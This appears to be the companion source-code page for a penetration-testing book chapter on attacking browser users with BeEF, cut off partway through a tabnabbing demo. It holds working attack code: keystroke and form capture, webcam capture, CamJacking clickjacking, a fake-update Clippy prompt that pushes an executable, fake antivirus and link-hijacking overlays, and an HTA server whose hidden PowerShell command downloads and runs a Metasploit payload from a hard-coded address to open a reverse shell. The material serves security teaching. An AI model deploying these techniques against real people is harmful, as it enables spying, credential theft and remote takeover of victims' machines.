
Ch5 Source Code - Attacking Users


beef.net.send and beef.dom.attachApplet API functions

For the following two functions referenced in Ch05:
beef.net.send
beef.dom.attachApplet

Have a look at the BeEF Git repo (the links below anchor to specific line numbers on master, so they may drift as those files change):
https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L110
https://github.com/beefproject/beef/blob/master/core/main/client/dom.js#L377

Detect Tor

BeEF's detect_tor module configuration (the verdict rests on whether the configured .onion image loads, so an offline hidden service or a blocked request is reported as "not behind Tor" — a false negative):

class Detect_tor < BeEF::Core::Command

    # Operator-tunable options rendered into the client-side script: the
    # .onion image the hooked browser tries to fetch, and how long (ms) the
    # script waits before reporting a verdict.
    def self.options
        [
            {'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg'},
            {'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'}
        ]
    end

    # Called when the zombie posts its result back; persists it unless the
    # browser sent nothing.
    def post_execute
        result = @datastore['result']
        save({'result' => result}) unless result.nil?
    end

end

BeEF's detect_tor module source:

beef.execute(function() {

	// Tor detection by side channel: a .onion hostname only resolves when the
	// browser's traffic goes through Tor, so a successful image load means Tor,
	// an error means direct (or a proxy that does not know .onion), and neither
	// within the timeout is reported as undetermined. An unreachable hidden
	// service therefore shows up as "not behind Tor" — a false negative.
	if (document.getElementById('torimg')) {
		return "Img already created";
	}

	var probe = new Image();
	probe.setAttribute("style","visibility:hidden");
	probe.setAttribute("width","0");
	probe.setAttribute("height","0");
	probe.src = '<%= @tor_resource %>';
	probe.id = 'torimg';
	// "attr" carries the probe state: start -> load | error
	probe.setAttribute("attr","start");
	probe.onerror = function() { this.setAttribute("attr","error"); };
	probe.onload = function() { this.setAttribute("attr","load"); };

	document.body.appendChild(probe);

	// One message per state; any other state sends nothing.
	var verdicts = {
		"error": 'result=Browser is not behind Tor',
		"load": 'result=Browser is behind Tor',
		"start": 'result=Browser timed out. Cannot determine if browser is behind Tor'
	};

	setTimeout(function() {
		var state = document.getElementById('torimg').getAttribute("attr");
		if (verdicts.hasOwnProperty(state)) {
			beef.net.send('<%= @command_url %>', <%= @command_id %>, verdicts[state]);
		}
		document.body.removeChild(probe);
	}, <%= @timeout %>);

});

HTML5 WebCam capture

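<html>
<head><title>HTML5 Webcam Capture</title>
<!-- https: a plain-http script include can be replaced by any on-path attacker -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>Make sure you accept the dialog!</h1>
	<!-- video and canvas are not void elements: the self-closing "<video />" form
	     is parsed as an open tag, so the canvas and the output paragraph ended up
	     nested inside the video element (hidden fallback content). Explicit close
	     tags keep them as siblings. The canvas gets an explicit capture size; the
	     default 300x150 clips the frame. -->
	<video autoplay id="vid_el" style="display:none;"></video>
	<canvas id="can_el" width="640" height="480" style="display:none;"></canvas>
	<p id="output"></p>
<script>
$(document).ready(function() {

	var vid = $('#vid_el').get(0);
	var can = $('#can_el').get(0);
	var ctx = can.getContext('2d');

	var localMediaStream = null;

	// Copies the current video frame onto the canvas and dumps it as a data: URL.
	var cap = function() {
		if (localMediaStream) {
			ctx.drawImage(vid, 0, 0);
			// text(), not html(): the output is data, not markup
			$('#output').text('image=' + can.toDataURL('image/png'));
		} else {
			$('#output').text('result=something went wrong');
		}
	};

	// Attaches the stream to the video element. srcObject is the current API;
	// createObjectURL(MediaStream) is the legacy path and has been removed
	// from current browsers, so it is only used when srcObject is absent.
	var attach = function(stream) {
		if ('srcObject' in vid) {
			vid.srcObject = stream;
		} else {
			window.URL = window.URL || window.webkitURL;
			vid.src = window.URL.createObjectURL(stream);
		}
		localMediaStream = stream;
		// give the camera a moment to deliver frames before grabbing one
		setTimeout(cap, 2000);
	};

	// Permission denied, no camera, or no API at all.
	var fail = function() {
		$('#output').text('result=getUserMedia call failed');
	};

	// Promise-based API first, then the vendor-prefixed callback forms.
	if (navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
		navigator.mediaDevices.getUserMedia({video:true}).then(attach, fail);
	} else {
		var legacy = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
		if (legacy) {
			legacy.call(navigator, {video:true}, attach, fail);
		} else {
			fail();
		}
	}
});
</script>

</body>
</html>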

CamJacking (Egor Homakov technique)

cam.swf file: SWF file

SWF embed page:


<html>
<head>
<title>Sakurity babies</title>
<!-- Works with Chrome <= 28  -->
</head>
<body>
<script>
// Rotates the decoy image every 3 s so the page looks alive while the fully
// transparent Flash object sits over the fake "play" button and collects
// the real click (the CamJacking variant of clickjacking).
function update_image(){
  var decoy = document.getElementById("girl");
  var pick = Math.floor(Math.random()*9)+1;
  decoy.src = "./mycrush" + pick + ".jpg";
}
window.onload = update_image;
setInterval(update_image, 3000);

</script>
<img style="opacity:0.5" id="girl">
<img style="position:absolute;left:200px;top:300px;" src="./play_white.png">

<object style="opacity:0.0;position:absolute;top:129px;left:100px;"  width="270" height="270">
<param name="movie" value="cam.swf">
<embed src="cam.swf" width="270" height="270"></embed>
</object>
<br />
<a href="http://homakov.blogspot.ru/2013/06/camjacking-click-and-say-cheese.html">how it works</a>
</body>
</html>

Capture user input - blur/focus capture

<html>
<head><title>Blur / Focus Capturing</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. If you lose and re-focus - you'll see events written to the page.</h1>
	<p id="output"></p>
<script>
$(document).ready(function() {
	// Logs window focus changes: this is the primitive tabnabbing-style
	// attacks use to learn when the victim is (not) looking at the page.
	var log = function(label) {
		return function(event) {
			$('#output').append(label + "<br />");
		};
	};
	$(window).focus(log("Focused")).blur(log("Blurred"));
});

</script>

</body>
</html>

Capture user input - form capture

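<html>
<head><title>Form Capturing</title>
<!-- https: a plain-http script include can be replaced by any on-path attacker -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. Start typing...</h1>
	<!-- name attributes added: without them elements[i].name is "" and the
	     captured listing shows only the values. The submit button stays
	     unnamed: name="submit" would shadow form.submit(). -->
	<form method="post" action="/">Username: <input type="text" name="username" value="username" /><br />
		Password: <input type="password" name="password" value="password" /><br />
		<input type="submit" value="Test - dont use actual passwords!" />
	</form>
<script>
$(document).ready(function() {
	// Intercepts the submit and dumps every field, password included, before
	// the form would leave the page; preventDefault() keeps the demo local.
	$('form').submit(function(e) {
		e.preventDefault();
		var form = e.target;
		var values = "";
		for (var i = 0; i < form.elements.length; i++) {
			var el = form.elements[i];
			values += "[" + i + "]" + el.name + "=" + el.value + "\n";
		}
		var data = 'Action: ' + $(form).attr('action');
		data += ' - Method: ' + $(form).attr('method');
		data += ' - Values:\n' + values;
		alert(data);
	});
});

</script>

</body>
</html>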

Capture user input - keypress capture

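<html>
<head><title>Keypress Capturing</title>
<!-- https: a plain-http script include can be replaced by any on-path attacker -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. Start typing...</h1>
	<p id="output"></p>
<script>
$(document).ready(function() {
	// Document-wide keylogger: every keypress is decoded and written to the page.
	// The decoded character goes in as a text node, not via innerHTML: with the
	// original concatenation a typed "<" opened a tag, so following keystrokes
	// were parsed as markup and could inject script into the page.
	$(document).keypress(function(e) {
		var line = "Which: " + e.which +
			", fromCharCode: " + String.fromCharCode(e.which) +
			", alt: " + e.altKey + ", ctrl: " + e.ctrlKey + ", shift: " + e.shiftKey;
		$('#output').append($('<span>').text(line)).append("<br />");
	});
});

</script>

</body>
</html>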

Capture user input - mouse click capture

<html>
<head><title>Mouse Click Capturing</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. Click anywhere in the page.</h1>
	<p id="output"></p>
<script>
$(document).ready(function() {
	// The same click in three coordinate systems: page (document), client
	// (viewport) and screen (monitor). Each click replaces the previous output.
	$(document).on('click', function(event) {
		var lines = [
			"pageX: " + event.pageX + ", pageY: " + event.pageY,
			"clientX: " + event.clientX + ", clientY: " + event.clientY,
			"screenX: " + event.screenX + ", screenY: " + event.screenY
		];
		$('#output').html(lines.join("<br />"));
	});
});

</script>

</body>
</html>

Get the hooked page HTML

<html>
<head><title>This is a test title</title></head>
<body>

	<h1>This is the body of the page - that will be overwritten.</h1>
<script>

// Replaces the whole body and the title; the button and this script are
// discarded along with the rest of the body.
function go() {
  var replacement = "OVERWRITTEN";
  document.title = replacement;
  document.body.innerHTML = replacement;
}

</script>

<input type="button" onclick="go();" value="overwrite" />
</body>
</html>

Defacement example #1

<html>
<head><title>This is a test title</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page.</h1>
	<p>This paragraph will be overwritten</p>
<script>

// Overwrites every <p> on the page and reports how many were hit.
function go() {
  var paragraphs = $('p');
  paragraphs.html('OVERWRITTEN');
  alert("result=Defaced " + paragraphs.length + " elements");
}

</script>

<input type="button" onclick="go();" value="overwrite" />
</body>
</html>

Defacement example #2

<html>
<head><title>This is a test title</title></head>
<body>

	<h1>This is the body of the page - that will be alerted upon execution of the JavaScript</h1>
<script>
  // Returns a node's markup, or `missing` when the node cannot be read
  // (e.g. an engine that does not expose document.head).
  function grab(node, missing) {
    try {
      return node.innerHTML.toString();
    } catch (e) {
      return missing;
    }
  }

  var html_head = grab(document.head, "Error: document has no head");
  var html_body = grab(document.body, "Error: document has no body");

  alert('head=' + html_head + '&body=' + html_body);

</script>
</body>
</html>

HTA (HTML Application)

Non-malicious example (spawning calc.exe)

require 'rubygems'
require 'thin'
require 'rack'
require 'sinatra'

# Serves a one-line HTML Application: application/hta is the HTA MIME type,
# and the body runs calc.exe through WScript.Shell when IE executes it.
class Hta < Sinatra::Base
  before { content_type 'application/hta' }

  get "/application.hta" do
    "<script>new ActiveXObject('WScript.Shell').Run('calc.exe')</script>"
  end
end

# Mount the app at / and listen on every interface, port 4000: the HTA is
# reachable from the whole network, not just localhost.
@rack_app = Rack::URLMap.new("/" => Hta.new)
@thin = Thin::Server.new("0.0.0.0", 4000, @rack_app)

Thin::Logging.silent = false
Thin::Logging.debug = true

puts "[#{Time.now}] Thin ready"
@thin.start

Malicious example (reverse shell through powershell)

require 'rubygems'
require 'thin'
require 'rack'
require 'sinatra'

# Serves the HTA that launches the PowerShell stager. The route body is a
# Ruby double-quoted string, so the \" and \\\" escapes below become " and \"
# in the delivered HTA; the resulting command hides the window (-w hidden),
# skips the profile (-nop), bypasses the execution policy (-ep bypass) and
# IEX-es whatever the hard-coded URL returns.
class Hta < Sinatra::Base
    before do
        content_type 'application/hta'
    end

    # http://192.168.0.4:8080/anti is metasploit running the psh_web_delivery module
    # target: Win7(x86) IE 10
    # add "set AutoRunScript post/windows/manage/smart_migrate" to the module option in MSF.
    # The string is the response body (last expression of the block).
    get "/app" do
    "<script>
    var c = \"cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c \\\"\\\"IEX ((new-object net.webclient).downloadstring('http://192.168.0.4:8080/anti'))\\\"\\\"\";
    new ActiveXObject('WScript.Shell').Run(c);
    </script>"
    end

end

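# we can serve 2 different payloads, one for x86 and another for x86_64 Windows system.
# the fingerprinting can be instead done with BeEF, in order to serve an HTA with a link to a proper payload.
#
# Serves the file "powershell_code" as text/plain. The path is resolved
# against the process working directory and re-read on every request, so
# the payload can be swapped without restarting the server.
class Shellcode < Sinatra::Base
    before do
        content_type 'text/plain'
    end

    get "/payload" do
        # the block's value is the response body (the old `result` local was unused)
        File.read("powershell_code")
    end
end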

# /hta serves the HTA, /sc the PowerShell payload; both on every interface,
# port 4000, so they are reachable from the whole network.
@rack_app = Rack::URLMap.new(
  "/hta" => Hta.new,
  "/sc" => Shellcode.new
)
@thin = Thin::Server.new("0.0.0.0", 4000, @rack_app)

Thin::Logging.silent = false
Thin::Logging.debug = true

puts "[#{Time.now}] Thin ready"
@thin.start

JavaPayload

You can get the sources of Java Payload from Michael Schierl Github repository:
https://github.com/schierlm/JavaPayload

Social Engineering - Heretic Clippy (BeEF module source)

beef.execute(function() {
  
/**
 * Heretic Clippy
 * @version 1.0.0
 * @author sprky0
 * @modified vt & denden
**/

// Runs `run` once a <body> element exists, polling every 10 ms until then
// (the module may be injected before the page has finished parsing).
function __clippyboot(run) {
	var job = run;
	var bodyReady = !!document.getElementsByTagName("body")[0];
	if (bodyReady) {
		job();
		return;
	}
	setTimeout(function(){ __clippyboot(job); }, 10);
}

// Page-unique id generator for HelpText keys: "_1", "_2", ...
var GUID = {
	base: "_",
	cur: 0,
	get: function() {
		this.cur += 1;
		return this.base + this.cur;
	}
};

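// One prompt Clippy can show: a question plus its answer buttons. `key` is a
// page-unique id from GUID; `views` counts renders and, unless `reusable`,
// a prompt is available() once only.
var HelpText = function(_question,reusable) {
	this.question = _question;
	this.options = [];
	this.key = GUID.get();
	this.views = 0;
	this.reusable = (reusable === true);
	this.timeout = {};
	return this;
}
HelpText.prototype.available = function() {
	return (this.views < 1 || this.reusable === true);
}
// Answer that navigates the page to `_url`.
HelpText.prototype.addResponseURL = function(_text,_url) {
	this.options.push({text:_text,URL:_url,rel:"external"});
	return;
}
// Answer that runs `_callback` in-page.
HelpText.prototype.addResponse = function(_text,_callback) {
	this.options.push({text:_text,callback:_callback,rel:"internal"});
	return;
}
// Optional callback fired `_timeout` ms (default 500) after the prompt renders.
HelpText.prototype.addTimeout = function(_timeout,_callback) {
	this.timeout = {callback:_callback,timeout:_timeout};
}
HelpText.prototype.getKey = function() {return this.key;}
// String form is the key. (Two toString definitions used to exist; the
// first, returning the question, was immediately shadowed by this one.)
HelpText.prototype.toString = function() {
	return this.getKey();
}
// Builds a click handler bound to one URL. The original loop captured a
// function-scoped `var _Option`, so every external button navigated to the
// LAST external option's URL; a per-option closure fixes that.
function __helpTextNavigate(url) {
	return function(){
		window.location = url;
	};
}
// Renders the question and its buttons into a fresh <div>; bumps `views`.
// Question and button text are inserted as HTML (module-operator supplied).
HelpText.prototype.toElements = function() {

	this.views++;

	var div = document.createElement('div');
	var p = document.createElement('p');
	p.innerHTML = this.question;
	div.appendChild(p);

	for(var i = 0; i < this.options.length; i++) {
		var option = this.options[i];
		var button = document.createElement('button');
		button.innerHTML = option.text;
		if (option.rel == "internal")
			button.onclick = option.callback;
		else
			button.onclick = __helpTextNavigate(option.URL);
		div.appendChild(button);
	}

	if (this.timeout.callback && typeof(this.timeout.callback) == "function") {
		setTimeout(this.timeout.callback, (this.timeout.timeout ? this.timeout.timeout : 500));
	}

	return div;
}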

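/* CLIPPY Display: the sprite itself, an <img> in a 102x98 box pinned
 * bottom-right. On IE the image is swapped in by fadeIn() through a
 * revealTrans filter; elsewhere opacity is stepped over ~200 timer ticks. */
var ClippyDisplay = function(options) {

	this.file_dir = (options.file_dir) ? options.file_dir : "";

	this.div = document.createElement('div');
	this.div.style.zIndex = 1000000;
	this.div.style.width = "102px";
	this.div.style.height = "98px";
	this.div.style.backgroundColor = "transparent";
	this.div.style.position = "absolute";
	this.div.style.bottom = 0;
	this.div.style.color = "black";
	this.div.style.right = "60px";
	this.div.style.display = "inline";

	if (navigator.userAgent.match(/MSIE/)) {
		// IE: no image yet; fadeIn() injects it together with the transition.
		this.div.style.filter = "revealTrans(transition=12,duration=1.8)";
	}
	else {
		var img = new Image();
		img.src = this.file_dir + "clippy-main.png";
		img.style.position = "relative";
		img.style.display = "block";
		img.id = "clippyid";

		this.div.appendChild(img);
	}

	this.div.style.opacity = (options.visible === false) ? 0 : 1;

	return this;
}
ClippyDisplay.prototype.getElement = function() {
	return this.div || null;
}
// Steps opacity from 0 towards 1 over `duration` ms. `options` is the
// recursion state (step/value/remain/increment) and is omitted by callers.
ClippyDisplay.prototype.fadeIn = function(duration,options) {

	var _clipple = this;

	if (!options)
		options = {};
	if (!options.step)
		options.step = 1 / 200;
	if (!options.value)
		options.value = 0;
	if (!options.remain)
		options.remain = 199;
	if (!options.increment)
		options.increment = duration / 200;

	options.remain--;
	options.value += options.step;

	if (navigator.userAgent.match(/MSIE/)) {
		// `var` added: this used to leak an implicit global named imgfile
		var imgfile = _clipple.file_dir + "clippy-main.png";
		_clipple.div.filters[0].Apply();
		_clipple.div.innerHTML="<img src='"+imgfile+"' />";
		_clipple.div.filters[0].Play();
	}
	else {
		_clipple.div.style.opacity = options.value;
		if (options.remain > 0) { setTimeout(function(){_clipple.fadeIn(duration,options);}, options.increment); }
	}

	return;
}


// Reverse of fadeIn(). When done (immediately on IE) it removes the whole
// "pipes" container that Clippy.findHomeBase() creates, so a page without
// an element of that id will throw here (removeChild(null)).
ClippyDisplay.prototype.fadeOut = function(duration,options) {

	var _clipple = this;

	if (!options)
		options = {};
	if (!options.step)
		options.step = 1 / 200;
	if (!options.value)
		options.value = 1;
	if (!options.remain)
		options.remain = 199;
	if (!options.increment)
		options.increment = duration / 200;

	options.remain--;
	options.value -= options.step;
	_clipple.div.style.opacity = options.value;

	if (navigator.userAgent.match(/MSIE/)) {
		document.body.removeChild(document.getElementById("pipes"));
	}
	else {
		if (options.remain > 0) {
			setTimeout(function(){_clipple.fadeOut(duration,options);}, options.increment);
		}
		else{
			document.body.removeChild(document.getElementById("pipes"));
		}
	}

	return;
}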


/** SPEECH BUBBLE **/

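// Speech bubble: a top cap image, a repeat-y middle holding `o` (a string is
// wrapped in a <p> and inserted as HTML), and a bottom cap, positioned just
// above the sprite.
var PopupDisplay = function(o,options) {

	this.file_dir = (options.file_dir) ? options.file_dir : "";

	if (typeof(o) === "string") {
		// `var` added: this used to leak an implicit global named p
		var p = document.createElement('p');
		p.innerHTML = o;
		o = p;
	}

	this.div = document.createElement('div');
	this.div.style.zIndex = 1000000;
	this.div.style.width = "130px";
	this.div.style.height = "auto";
	this.div.style.backgroundColor = "transparent";
	this.div.style.color = "black";
	this.div.style.position = "absolute";
	this.div.style.bottom = "85px";
	this.div.style.right = "55px";
	this.div.style.display = "block";

	var imgTop = new Image();
	imgTop.src = this.file_dir + "clippy-speech-top.png";
	imgTop.style.position = "relative";
	imgTop.style.display = "block";
	this.div.appendChild(imgTop);

	this.message = document.createElement('div');
	this.message.style.background = "transparent url('" + this.file_dir + "clippy-speech-mid.png') top left repeat-y";
	this.message.style.padding = "8px";
	this.message.style.font = "11.5px Arial, Verdana, Sans";
	this.message.appendChild(o);

	this.div.appendChild(this.message);

	var imgBottom = new Image();
	imgBottom.src = this.file_dir + "clippy-speech-bottom.png";
	imgBottom.style.position = "relative";
	imgBottom.style.display = "block";
	this.div.appendChild(imgBottom);

	return this;
}
// Detaches the bubble from its parent; a bubble that is not in the DOM, or a
// DOM error while removing it, is silently ignored (best-effort cleanup).
PopupDisplay.prototype.close = function() {
	try {
		var div = this.getElement();
		if (div != null && div.parentNode) {
			div = div.parentNode;
			div.removeChild(this.getElement());
		}
	} catch(e) {
		// alert(e)
	}
}
PopupDisplay.prototype.getElement = function() {
	return this.div;
}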


/** CLIPPY controller **/

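// CLIPPY controller: owns the sprite, the speech bubble and the registered
// HelpText prompts; run() starts the show.
var Clippy = function(_homeSelector,file_dir) {
	this.help = {};
	// What options are OK to use as an introductory question?
	this.firstlines = [];
	this.homebase = this.findHomeBase(_homeSelector);
	this.timer = false;
	this.file_dir = file_dir;
	return this;
}
// Resolves where Clippy lives. "#id" selects an existing element by id — the
// leading "#" is now stripped; it used to be passed straight to
// getElementById, which therefore never matched. Any other selector is a tag
// name: a fixed 300x300 "pipes" container is appended to the first such
// element and returned. ClippyDisplay.fadeOut() later removes "#pipes", so on
// the "#id" path there is no such element for it to find.
Clippy.prototype.findHomeBase = function(selector) {

	if (!selector)
		selector = "body";

	var ref = false;

	if (selector.charAt(0)=="#") {
		ref = document.getElementById(selector.substring(1));
		beef.debug(ref);
		return ref;
	}

	ref = document.getElementsByTagName(selector)[0];

	var div = document.createElement("div");

	div.style.zIndex = 9999999;
	div.id = "pipes";
	div.style.width = "300px";
	div.style.height = "300px";
	div.style.backgroundColor = "transparent";
	div.style.position = "fixed";
	div.style.bottom = "0";
	div.style.right = "0";

	ref.appendChild(div);

	return div;
}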
// Shows the sprite, registers the single yes/no prompt and schedules it.
// The <%== %> tags are BeEF option values pasted verbatim into this script
// at render time, so an option containing a double quote breaks the script.
Clippy.prototype.run = function(opt) {

	var self = this;

	self.character = new ClippyDisplay({
		file_dir : self.file_dir,
		visible : false
	});
	self.homebase.appendChild( self.character.getElement() );
	self.character.fadeIn(1000);

	var question = new HelpText("<%== @askusertext %>");
	question.addResponse("Yes", function(){ self.hahaha(); } );
	question.addResponse("Not now", function(){
		self.killClippy();
		// respawn a fresh Clippy after the configured delay
		setTimeout(function() { new Clippy("body","<%== @clippydir %>").run(); },"<%== @respawntime %>");
	} );
	self.addHelp(question,true);

	// initial wait
	self.talkLater();

}
// Close the bubble and fade the sprite away.
Clippy.prototype.killClippy = function(){
	this.closeBubble();
	this.character.fadeOut(1000);
}
// "Yes" handler: loads the configured URL (the module option calls it the
// executable to download) in a hidden iframe, thanks the user, and reports
// the acceptance back to the BeEF server.
Clippy.prototype.hahaha = function() {
	var self = this;
	var holder = document.createElement("div");
	holder.id = "heehee";
	holder.style.display = "none";
	holder.innerHTML="<iframe src='<%== @executeyes %>' width=1 height=1 style='display:none'></iframe>";

	document.body.appendChild(holder);
	self.openBubble("<%== @thankyoumessage %>");
	setTimeout(function () { self.killClippy(); }, 5000);
	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
}
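// Registers a prompt under its key; start phrases are eligible for firstLine().
Clippy.prototype.addHelp = function(_help, is_startphrase) {
	this.help[ _help.getKey() ] = _help;
	if (is_startphrase)
		this.firstlines.push( _help.getKey() );

	return;
}
// Picks a random key from `keys` that is still available and says it; gives
// up silently after keys.length random draws. `alternative` is kept for
// signature compatibility but unused. Math.floor replaces parseInt on a
// float: parseInt(5e-7) is 5, which could index past the end of `keys`.
Clippy.prototype.sayOne = function(keys,alternative) {

	var count = 0;

	while(count < keys.length) {
		var choice = Math.floor( Math.random() * keys.length );
		if( this.canSay( keys[choice]) ) {
			this.say(keys[choice]);
			return;
		}
		count ++;
	}

	return;
}
Clippy.prototype.canSay = function(key) {
	return this.help[ key ].available();
}
// Opens the bubble for one prompt key, cancelling a pending talkLater()
// timer first. An array of keys delegates to sayOne() and returns; the
// original fell through and indexed this.help with the array, which throws.
Clippy.prototype.say = function(key,alternative) {

	if (this.timer != false) {
		try {
			clearTimeout(this.timer);
			this.timer = false;
		} catch(e) {}
	}

	if(typeof(key) !== "string" && key.length) {
		this.sayOne(key,alternative);
		return;
	}

	this.openBubble( this.help[ key ].toElements() );
}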
// Says one of the registered start phrases.
Clippy.prototype.firstLine = function() {
	this.sayOne(this.firstlines);
}
// Closes whatever is open and speaks an opening line 2 s later.
Clippy.prototype.talkLater = function() {
	var self = this;
	this.closeBubble();
	this.timer = setTimeout( function() { self.firstLine(); }, 2000);
}
// Replaces the current bubble with a new one holding `_o`; a string becomes
// a <p> whose content is inserted as HTML.
Clippy.prototype.openBubble = function(_o) {
	var content = _o;
	if (typeof(_o)=="string") {
		content = document.createElement("p");
		content.innerHTML = _o;
	}
	this.closeBubble();
	this.bubble = new PopupDisplay(content,{file_dir:this.file_dir});
	this.homebase.appendChild(this.bubble.getElement());
}
Clippy.prototype.closeBubble = function() {
	if (this.bubble) {
		this.bubble.close();
	}
}

/* APPLICATION LOGIC: wait for <body>, then start a Clippy whose images are
 * served from the configured web directory. */
__clippyboot(function(){
	new Clippy("body","<%== @clippydir %>").run();
});

});

Social Engineering - Heretic Clippy (BeEF module configuration)

#
# Copyright (c) 2006-2013 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
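class Clippy < BeEF::Core::Command
  
  # Operator-tunable options. command.js pastes them into the script with
  # <%== %> (unescaped), so values must not contain double quotes.
  def self.options
    return [
        {'name' =>'clippydir', 'description' =>'Webdir containing clippy image', 'ui_label'=>'Clippy image', 'value' => 'http://clippy.ajbnet.com/1.0.0/'},
        {'name' =>'askusertext', 'description' =>'Text for speech bubble', 'ui_label'=>'Custom text', 'value' => 'Your browser appears to be out of date. Would you like to upgrade it?'},
        {'name' =>'executeyes', 'description' =>'Executable to download', 'ui_label'=>'Executable', 'value' => 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'},
        {'name' =>'respawntime', 'description' =>'', 'ui_label'=>'Time until Clippy shows his face again', 'value' => '5000'},
        {'name' =>'thankyoumessage', 'description' =>'Thankyou message after downloading', 'ui_label'=>'Thankyou message after downloading', 'value' => 'Thanks for upgrading your browser! Look forward to a safer, faster web!'}
    ]
  end
  
  #
  # This method is being called when a zombie sends some
  # data back to the framework. Nothing is saved when the browser
  # reported no answer (same guard as detect_tor's post_execute).
  #
  def post_execute
    return if @datastore['answer'].nil?
    save({'answer' => @datastore['answer']})
  end
  
end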

Social Engineering - Crappy Prompt

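<html>
<head><title>Crappy Prompt</title>
<!-- https: a plain-http script include can be replaced by any on-path attacker -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<p id="output"></p>
	
<script>
$(document).ready(function() {

	// Explicitly on window: the inline onclick below resolves it there
	// (the original relied on an implicit global).
	window.go = function() {
		// prompt() returns null on Cancel; string concatenation renders it as "null".
		var answer = prompt("Enter your password:");
		// Inserted as text, not HTML: with innerHTML a typed "<img onerror=...>"
		// would run on the page instead of being displayed.
		$('#output')
			.append($('<span>').text("You wrote: " + answer))
			.append("<br />");
	};
});

</script>
<input type="button" value="click me" onclick="go();" />

</body>
</html>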

Social Engineering - Fake AntiVirus

Fake AV image: fakeav.png

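<html>
<head><title>Fake AV</title>
<!-- https: a plain-http script include can be replaced by any on-path attacker -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page.</h1>
	
<script>
$(document).ready(function() {

// Creates (once) and toggles a black 70%-opacity layer over the page. It is
// position:absolute at 100% width/height, so it covers the initial viewport
// only; content scrolled into view below that is not darkened.
function grayOut(vis) {
  var dark=document.getElementById('darkenScreenObject');
  if (!dark) {
    var tbody = document.getElementsByTagName("body")[0];
    var tnode = document.createElement('div');
        tnode.style.position='absolute';
        tnode.style.top='0px';
        tnode.style.left='0px';
        tnode.style.overflow='hidden';
        tnode.style.display='none';
        tnode.id='darkenScreenObject';
    tbody.appendChild(tnode);
    dark=document.getElementById('darkenScreenObject');
  }
  if (vis) {
    var opacity = 70;
    var opaque = (opacity / 100);
    dark.style.opacity=opaque;
    dark.style.MozOpacity=opaque;
    dark.style.filter='alpha(opacity='+opacity+')';
    dark.style.zIndex=100;
    dark.style.backgroundColor='#000';
    dark.style.width='100%';
    dark.style.height='100%';
    dark.style.display='block';
  } else {
     dark.style.display='none';
  }
}

// Drops the fake scanner image, centred in the viewport and above the
// overlay (z-index 101 > 100).
function avpop() {
  // `var` added: avdiv used to leak as an implicit global
  var avdiv = document.createElement('div');
  avdiv.setAttribute('id', 'avpop');
  avdiv.setAttribute('style', 'width:754px;height:488px;position:fixed;top:50%; left:50%; margin-left: -377px; margin-top: -244px; z-index:101');
  avdiv.setAttribute('align', 'center');
  document.body.appendChild(avdiv);
  avdiv.innerHTML= '<br><img id=\'avclicker\' src=\'fakeav.png\' />';
}

// Explicitly on window: the inline onclick below resolves it there.
window.go = function() {
	grayOut(true);
	avpop();

	// The alert stands in for whatever the fake AV would do once clicked;
	// the popup and overlay are then torn down.
	$('#avclicker').click(function(e) {

		alert("Bad things may occur here"); 

	  $('#avpop').remove();
	  grayOut(false);
	});
};

});
</script>
<input type="button" value="Launch fake AV" onclick="go();" />
</body>
</html>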

FullScreen Overlay IFrame

<html>
<head><title>Full screen iframe</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page.</h1>
	<a href="http://slashdot.org/">This is a link to slashdot - click me</a>
	
<script>
$(document).ready(function() {

	// Base styles for the two iframe flavours: 'hidden' is a 1x1 invisible
	// frame, 'fullscreen' paints over the whole page. `styles` overrides them.
	var baseStyles = {
		hidden: {
			'border':'none', 'width':'1px', 'height':'1px',
			'display':'none', 'visibility':'hidden'
		},
		fullscreen: {
			'border':'none', 'background-color':'white', 'width':'100%',
			'height':'100%',
			'position':'absolute', 'top':'0px', 'left':'0px'
		}
	};

	// Prepends an <iframe> with attributes `params` and the styles for `type`.
	function createIframe(type, params, styles, onload) {
		var css = {};
		if (baseStyles.hasOwnProperty(type)) {
			css = $.extend(true, {}, baseStyles[type], styles);
		}
		if (type == 'fullscreen') {
			$('body').css({'padding':'0px', 'margin':'0px'});
		}
		return $('<iframe />').attr(params).css(css).load(onload).prependTo('body');
	}

	// Every link click is hijacked: the real destination is dropped and the
	// page is covered by a frame of attacker-chosen content while the address
	// bar still shows the original URL.
	$('a').click(function(event) {
		if ($(this).attr('href') == '') {
			return;
		}
		event.preventDefault();
		createIframe('fullscreen', {'src':'http://beefproject.com/'}, {}, null);
		$(document).attr('title',"BeEFEEFFF");
		document.body.scroll = "no";
		document.documentElement.style.overflow = 'hidden';
	});

});
</script>
</body>
</html>

TabNabbing

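<html>
<head><title>Nab this Tab!</title>
<!-- https: a plain-http script include can be replaced by any on-path attacker -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. If you leave this tab for 30 seconds it'll change</h1>
	<p id="output"></p>
	
<script>
$(document).ready(function() {

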